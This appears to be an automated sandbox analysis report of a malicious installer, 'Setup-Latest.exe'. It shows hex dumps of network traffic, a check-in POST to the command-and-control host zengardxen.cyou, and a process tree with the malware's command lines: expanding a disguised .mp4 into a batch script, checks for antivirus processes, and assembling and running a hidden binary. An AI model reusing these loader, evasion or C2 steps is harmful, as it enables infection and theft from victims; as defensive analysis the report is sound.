                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 75 5e 54 77 2c a6 ee e2 c9 c9 cf 27 40 0a da 18 37 7a ce f1 f9 41 35 47 90 71 1b cc 63 ea e2 0e 33 66 64 c0 77 ce c7 91 f2 59 f6 5c 90 1e 78 c9 bf a8 54 0a 5e 09 6e ec a8 87 d3 4f 08 6c 9c 20 a2 bb b5 e1 1a 1a 32 ec 98 28 f6 74 4f b0 d6 38 61 b1 03 03 1a 05 d9 67 08 40 6b 48 a5 ae 0a 55 bf f5 ea bd e6 62 d5 c7 2a 8f 21 cc c2 4e 57 3b 34 fd d4 d0 ad 37 7d 39 1f b7 de 8e fd 3c 56 71 be ea b8 60 a9 5f 63 f7 4d c9 aa 6f 48 03 d5 b5 98 0b ef 79 76 e4 29 c2 3b 98 c5 71 12 60 dd 5a a1 6e 33 cc e9 17 50 8e 08 4e 9d 9f 3b 25 b0 b1 3a 71 d8 07 02 fd 6f 05 67 65 b5 e6 36 4b 90 76 23 01 7c 33 c3 fe 96 9d c6 81 59 4b 77 30 7c 02 05 1f c8 39 88 08 3a ec 7c 17 d4 8b 88 12 89 b0 0d d6 ee cf c4 b9 8c f4 54 96 c5 eb da 18 b1 c5 cf dd 9d d2 96 12 bc 42 42 64 8d 1d e6 8f e4
                                    Data Ascii: u^Tw,'@7zA5Gqc3fdwY\xT^nOl 2(tO8ag@kHUb*!NW;47}9<Vq`_cMoHyv);q`Zn3PN;%:qoge6Kv#|3YKw0|9:|TBBd
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 3b ed fd 12 52 96 e5 81 96 34 c3 01 89 3f a5 7f 9f 34 2a 0e 52 56 11 e6 f4 99 88 e8 7f 2d 90 e1 87 29 01 f0 e0 5b 22 c8 b7 91 64 b8 a0 e9 be 32 b7 41 f6 59 ba d4 a2 ab a6 6c be 05 b0 24 4f 7f 43 ad c6 6a 43 4e b0 79 66 b5 04 db 0a 20 dc 59 1c 90 c4 d0 30 df 36 4f 1c 2b 01 b4 37 44 3a 09 d6 60 e0 f7 7d e1 10 24 be 25 08 da a1 ce 3f 34 f2 11 89 88 2b b1 fe f8 7d a7 08 3f 24 be 0e 4d 8a ac be c1 73 3c c6 64 52 69 c1 69 3d b6 85 e6 e6 4a b5 c1 0e 3b 3d cc 10 72 3d 26 e9 c5 75 13 93 82 09 ae 5f d2 62 7f 1f 87 b6 8b 71 a1 09 b7 2f c6 4b 6e 2d 05 98 3b a3 ee ba de 5b f8 5e e5 dc 4f d3 66 25 1c 32 aa 30 71 e6 3e fa c3 26 e4 7d 47 82 9a b0 49 2b ef d8 d3 f9 dd 7a 9d 6b f9 8f 25 23 f7 4d 76 d4 21 e1 ea e3 88 7c f3 c8 5c c3 ba ea c3 1b 13 79 2b fe 6a 99 75 8e 47 33
                                    Data Ascii: ;R4?4*RV-)["d2AYl$OCjCNyf Y06O+7D:`}$%?4+}?$Ms<dRii=J;=r=&u_bq/Kn-;[^Of%20q>&}GI+zk%#Mv!|\y+juG3
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 83 f9 48 85 2f 0b fb b2 ee 55 f7 34 8a d6 7b e1 99 fa 31 56 8e 1c 10 2a 5b 38 da 05 fd 7b a3 e2 d0 92 6b 64 30 08 f0 9d 4f 2f c7 14 0b 9c 38 65 30 29 d7 69 15 11 48 96 68 bb f4 51 5e 31 a5 7c 4b eb 19 92 2d 19 38 65 d2 75 2c d4 2e 4f d7 b2 fc 89 19 3b 6b d3 4a 78 de 69 31 13 d2 db f0 6a 8e b2 a9 41 6e 63 5f 07 fc bd f4 9a 22 f0 28 5e 74 d6 5c a9 1a 20 db 3a 09 c3 a4 13 24 29 57 7c f7 b8 c3 d0 68 0b 45 07 85 c6 b4 28 a6 fb 00 d1 a1 e2 70 9a 32 ef b9 d2 2c ec ce 2d fb a8 60 2d 23 38 9a 56 d4 71 9e 96 ee 1a ac 00 ab fd 98 e5 02 36 40 68 09 2f f0 4c 0d 1e b1 17 de 94 9a ea f2 a5 da 9a f9 6d 07 28 cd 7e d2 ec b6 52 fe 2b 98 8b 18 1e c6 a3 3c 67 02 61 5e 1f 3f 21 96 0b b1 72 4a 93 fe 0d a3 de 19 08 99 ca e9 49 4c 1a 48 6c d5 f1 af 69 91 c7 7b c4 e8 63 fc 01 12
                                    Data Ascii: H/U4{1V*[8{kd0O/8e0)iHhQ^1|K-8eu,.O;kJxi1jAnc_"(^t\ :$)W|hE(p2,-`-#8Vq6@h/Lm(~R+<ga^?!rJILHli{c
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: e3 da 4a e0 86 68 44 86 c2 7d bc fd 21 c4 3b 43 c8 aa 38 70 d9 f6 af 29 57 28 c3 9f c3 0e f4 11 e3 b2 7c 9c c2 f6 03 44 74 c8 52 cc 3c b0 3d 07 0b b0 f0 7f 88 92 42 b7 d6 0b 91 2d 33 33 e6 f7 f0 8e 49 13 3b e6 a8 87 59 62 e9 a7 69 32 20 5d 1b 82 20 fb 9b 34 e1 d5 1f 7d 5e 07 09 b9 f1 b5 de 6b d0 f4 4f 01 a2 70 44 01 bf ed 49 5c 86 3b 9f fa 37 5a 74 28 86 ea c1 5f 82 64 ce 3c a5 04 e3 0b 21 a4 b8 ed fe ff f8 36 7f 86 61 82 bd 57 f9 07 af ff b2 19 8a 20 70 15 1f 4a 2e 48 5c 41 07 1f 39 ee da 91 74 b7 61 57 be a3 56 ad 88 bb 1b ce 11 38 d6 1e 4d 9d 66 bd b2 52 f9 d9 fe f4 76 c7 ee 41 42 f6 d1 c1 0f b7 15 79 3f d2 2d 46 a5 8f 6f bf 2e 36 f7 c0 5d a8 e5 b1 c5 b0 07 35 ac 6c d2 eb b4 53 17 4c b3 9b 9e 85 f7 fc 9c 74 15 7c 7e 8c 18 66 21 05 5f 48 81 b2 bd 13 ce
                                    Data Ascii: JhD}!;C8p)W(|DtR<=B-33I;Ybi2 ] 4}^kOpDI\;7Zt(_d<!6aW pJ.H\A9taWV8MfRvABy?-Fo.6]5lSLt|~f!_H
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 4d 26 68 5d 8d 4a 10 d9 33 7d 48 e5 f5 80 c5 ab 1a 82 00 b4 34 85 7a 8d 67 4c 61 5e 8f f3 f1 1a c6 84 c1 b1 5b ad 1b c7 04 6c 11 f3 ef cd ab ca 12 5c be ee 91 e4 43 d9 ce ab d3 e5 5a f7 9b 20 b9 d4 28 4a 7d cc 28 b8 3e b1 f3 ee 45 02 c8 3f 38 76 4a 23 7d f7 7c d3 25 3d 2e 01 21 cd c3 34 ab a6 74 93 10 4f 05 64 e9 36 46 29 31 5f 2d 5e 8a 3c 89 0d b8 79 73 64 7b fe eb 89 fb 42 e0 d6 1d 4a f3 66 96 81 42 17 6a 96 e5 78 79 0a d7 87 9b 32 ed 4d 7f 0a d3 76 26 ed 61 53 08 d8 e1 e8 ff 4b 3c 94 00 e9 ef 23 5b 67 85 59 77 b7 17 8a 4f 2e a9 55 53 67 92 3a 75 24 f4 d3 cb 80 15 88 bb 08 f3 02 fd 9e e7 68 3c 88 53 a7 1b c7 41 06 54 1f 02 40 16 e0 41 34 ad f1 53 5b b1 f7 68 9d 0a 38 4e 4f f8 38 e2 af 3c 7f af a7 aa 28 47 81 91 84 03 f9 55 ac 2d 15 30 6b a5 2a 04 02 08
                                    Data Ascii: M&h]J3}H4zgLa^[l\CZ (J}(>E?8vJ#}|%=.!4tOd6F)1_-^<ysd{BJfBjxy2Mv&aSK<#[gYwO.USg:u$h<SAT@A4S[h8NO8<(GU-0k*
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: bd de 7c 47 d5 75 75 52 07 b2 16 91 78 69 7f 59 7d 37 42 a9 c5 77 ba 17 0e e2 31 a4 2b 0e 7d a9 22 c9 59 57 a5 4a 7e 96 e6 4e 19 bb 6e f1 33 f9 25 a7 67 0d 24 e4 7b 9e 3a f9 33 af 33 93 5c 8f 13 5a cf 25 a6 5d 03 c3 61 1b 43 bc 80 b5 fe 44 e3 15 db 7b 4b c9 d1 a0 66 9b 5f 64 3b 66 65 c1 b5 e6 a7 e4 5c df c7 7a 88 96 3e b4 f9 23 3b 60 78 2c 33 3b 3c 6f aa 72 df d9 1d e6 9b b3 3b 91 42 67 77 72 6a e2 d8 b8 c1 4b 4b ec e4 91 7f 69 06 27 a8 52 05 03 12 f1 df b9 c9 39 54 46 a1 54 a7 5e 42 de 69 59 ba ff d9 b0 b3 cc d8 dc 7d 4b 0b d5 ba 1c c2 a5 0b 5a ef 21 3a 9f 57 65 67 6d d9 bb 8e c0 ea 8d 9d ff 9b a5 94 e1 cf f0 97 0b 3b 70 fd d8 70 52 9b b0 e0 9b 23 86 42 30 69 8c 06 47 22 f4 af 30 49 e6 ee 35 25 1d c9 33 8a 67 ec 62 96 f4 d8 aa 13 6f ce 3a cb 88 08 1f ad
                                    Data Ascii: |GuuRxiY}7Bw1+}"YWJ~Nn3%g${:33\Z%]aCD{Kf_d;fe\z>#;`x,3;<or;BgwrjKKi'R9TFT^BiY}KZ!:Wegm;ppR#B0iG"0I5%3gbo:
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 27 a4 40 a6 5a e0 8f 1f 86 b3 a9 d7 0f 63 7d 52 6e 10 0e a7 a5 dc c0 9e d5 d4 d7 c4 07 2b f3 65 06 19 c2 8c 56 ca a4 23 93 31 df 55 3d c9 90 4c 0c be a7 bd 3f 94 92 fd 9e 40 d1 2c e0 d1 f0 95 37 a1 54 57 06 63 9f 87 8c f3 68 8b f6 d2 ff 5b 73 8b bc c8 82 27 c5 c0 e7 2a b0 39 80 a6 15 40 0c 91 21 97 1d 6a a8 31 0c e8 59 cd 46 51 d4 b8 95 ad b8 31 a8 45 e3 30 3f c1 de a7 0b f6 80 54 25 d7 ac 46 ec 58 a3 2b bf 61 a4 b8 81 02 35 c6 7b e3 12 b4 67 bc 5c 22 0c 60 c1 d5 bf cd 55 6f 7f c2 ae e8 ab 50 14 a3 92 b8 99 54 28 4f a1 60 61 08 35 3c 4d 0e 0f 4a 44 4b 20 05 fe 95 0e db 55 f0 88 2b b6 59 26 30 7a f3 23 33 94 9f cc a8 6c 1b 9c 89 86 5b 0b b0 66 2b 54 d4 f2 e3 26 f4 e9 c8 94 27 11 e9 aa fb 30 4c 45 4c 47 88 00 61 4f ff b7 7a 0f 6e 97 28 74 8b ee 2d 53 38 0c
                                    Data Ascii: '@Zc}Rn+eV#1U=L?@,7TWch[s'*9@!j1YFQ1E0?T%FX+a5{g\"`UoPT(O`a5<MJDK U+Y&0z#3l[f+T&'0LELGaOzn(t-S8
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 7c c9 a3 2f 07 b8 7c cc ba e4 9a fd f8 be e0 95 09 af 07 3d 86 56 4b 79 a6 91 90 d2 06 0f 0e 4a 4b 30 3d 3a e8 6f 4d 28 99 8a 0a d1 97 94 44 bf 8e b0 df e5 1c 8e 73 ba 54 89 f1 3e 8f 80 80 60 3d 15 a2 59 66 93 ee 72 d6 4e 9b f4 2e 6e bc 1f 39 20 a2 68 a5 63 29 72 7f d1 26 00 5c ac cc 5f 02 2b c5 cd 23 04 c0 25 a2 8b 27 e6 c4 1c 22 61 7c bd 70 42 e3 ef 1a 62 f9 c9 21 26 46 2e 55 29 25 1b 5e 57 53 9e dc 53 62 b5 2b d1 e0 30 bf 5a 71 e6 89 5f 41 a2 e3 63 2c 32 36 d8 ae c6 93 86 8a 21 09 dd 1f 9d 0d aa bc bb 80 56 d9 b0 4f ce e7 42 73 0f 7f b4 8c 1d e1 06 7e b1 27 c8 7a 84 31 05 de 69 32 3d f9 a4 a3 be 4a 9c 3b 59 4d a0 ed 67 c8 07 40 3a 64 46 72 e2 d9 7b f1 d8 8a 83 ef ce c8 db 18 d8 6b 39 77 33 9e 64 89 70 61 3a ff 9f 26 a1 6d 57 6f 10 9c 30 d5 ba 12 cd 9f
                                    Data Ascii: |/|=VKyJK0=:oM(DsT>`=YfrN.n9 hc)r&\_+#%'"a|pBb!&F.U)%^WSSb+0Zq_Ac,26!VOBs~'z1i2=J;YMg@:dFr{k9w3dpa:&mWo0
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 5e 3d b9 a2 4d 5f 84 37 7e 73 bc 63 37 7e 7c bd 97 54 ba c9 b9 e1 1e 1a 09 fb 94 ff aa a1 08 80 99 c0 e4 c8 e0 99 15 a6 86 27 a7 78 c3 68 a8 6b d9 cb c3 70 55 5e 00 22 8f ca 56 70 66 b7 f1 00 eb 6c fb a9 df b3 96 e6 f2 62 8c d3 a5 3a 2e 85 d3 95 00 78 22 7a b7 f3 90 78 d3 6e 90 b0 fe e1 74 1a bb cf 0a 5b b4 b2 71 49 a0 24 2f eb 76 dd e6 64 97 06 fe 8b 78 8c bd d3 e6 e2 18 2d 76 e3 77 e9 d0 83 53 2b c9 ec b3 fa 97 30 45 5b bb 86 7a a0 5a fb fd ed bf 42 5c 32 24 df 67 f5 26 b6 36 9f 41 7d 77 53 3e 92 0d 68 7f cc 8d f5 da 8f 41 f0 8f f0 2b b7 f3 ff 91 69 e1 99 34 f9 b1 96 2d 76 1a 2d 72 9a 8b 74 0c 32 2a 4f 3e c5 bd fb 70 d1 68 15 55 49 b8 aa 97 f1 c6 63 78 cf 80 ab 3b f3 cb de f8 aa aa 37 1e e1 e9 9a b0 7c 85 c3 5f 93 6c 1e 03 5e d6 93 2e 6d 43 5e 03 6d 95
                                    Data Ascii: ^=M_7~sc7~|T'xhkpU^"Vpflb:.x"zxnt[qI$/vdx-vwS+0E[zZB\2$g&6A}wS>hA+i4-v-rt2*O>phUIcx;7|_l^.mC^m
                                    2025-02-14 15:56:04 UTC1128INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=n47mm8savm8m2vvgi8vjnpp6u9; expires=Sat, 15 Feb 2025 15:56:04 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVs3w1lEawtvyf2FD0gV6h9fogNNbThpKbCfs8ekTqu8xDqGIvWdQBf9pIffa0%2BzsM34qT3mSFDqU%2BO2wwr9efmNijL%2BNYwhiMOSbIQljCJse3mpstUQslEiK4U3tkVd2t0%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ef7dcebc5af-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7200&min_rtt=7123&rtt_var=2726&sent=196&recv=577&lost=0&retrans=0&sent_bytes=2837&recv_bytes=561433&delivery_rate=409939&cwnd=32&unsent_bytes=0&cid=733821f5dc3d0d64&ts=1811&x=0"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.449744188.114.97.34437884C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    TimestampBytes transferredDirectionData
                                    2025-02-14 15:56:05 UTC263OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 80
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:05 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 6d 6d 6d 26 6a 3d 26 68 77 69 64 3d 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45
                                    Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--mmm&j=&hwid=00C86C1DFDB86EAC2BAC4A2D01E9EDDE
                                    2025-02-14 15:56:05 UTC1122INHTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=pssm86hrnu49riojm36ff079l7; expires=Sat, 15 Feb 2025 15:56:05 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zm5nsd9dUhSb2wBCvGYIVVHW6KeudG4zjuVXS9d5OKjKP1pm%2FQ%2BlpJXmmj2lreLbCeHtveyYVeUHG%2BDPXhjiNwAo3yL1SuNEpc7AgAuFn0Cd6up%2BuNmfIuDlYbO5hwDxKDk%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3f067d720829-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=8797&min_rtt=8790&rtt_var=3312&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=979&delivery_rate=329831&cwnd=32&unsent_bytes=0&cid=c8c15c19e973f65c&ts=556&x=0"
                                    2025-02-14 15:56:05 UTC54INData Raw: 33 30 0d 0a 36 46 2f 61 68 32 55 77 7a 72 72 47 47 31 6f 58 6c 51 4a 62 58 2b 6c 4d 4e 71 48 35 30 38 2f 73 67 61 6c 54 6a 59 49 79 78 32 65 7a 41 67 3d 3d 0d 0a
                                    Data Ascii: 306F/ah2UwzrrGG1oXlQJbX+lMNqH508/sgalTjYIyx2ezAg==
                                    2025-02-14 15:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Users\user\Desktop\Setup-Latest.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Setup-Latest.exe"
                                    Imagebase:0x400000
                                    File size:1'444'885 bytes
                                    MD5 hash:D905D14928E2766285ED7CA83EAAF4B3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:10:55:16
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\expand.exe
                                    Wow64 process (32bit):true
                                    Commandline:expand Wide.mp4 Wide.mp4.bat
                                    Imagebase:0x430000
                                    File size:53'248 bytes
                                    MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x50000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /I "opssvc wrsa"
                                    Imagebase:0x300000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x50000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:10:55:18
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                    Imagebase:0x300000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:10:55:19
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c md 562639
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:10:55:19
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                    Wow64 process (32bit):true
                                    Commandline:extrac32 /Y /E Always.mp4
                                    Imagebase:0x9c0000
                                    File size:29'184 bytes
                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /V "Yang" Labor
                                    Imagebase:0x300000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:10:55:20
                                    Start date:14/02/2025
                                    Path:C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    Wow64 process (32bit):true
                                    Commandline:Wages.com G
                                    Imagebase:0x8b0000
                                    File size:947'288 bytes
                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:10:55:21
                                    Start date:14/02/2025
                                    Path:C:\Windows\SysWOW64\choice.exe
                                    Wow64 process (32bit):true
                                    Commandline:choice /d y /t 5
                                    Imagebase:0x3c0000
                                    File size:28'160 bytes
                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:17.8%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1482
                                      Total number of Limit Nodes:28
                                      execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 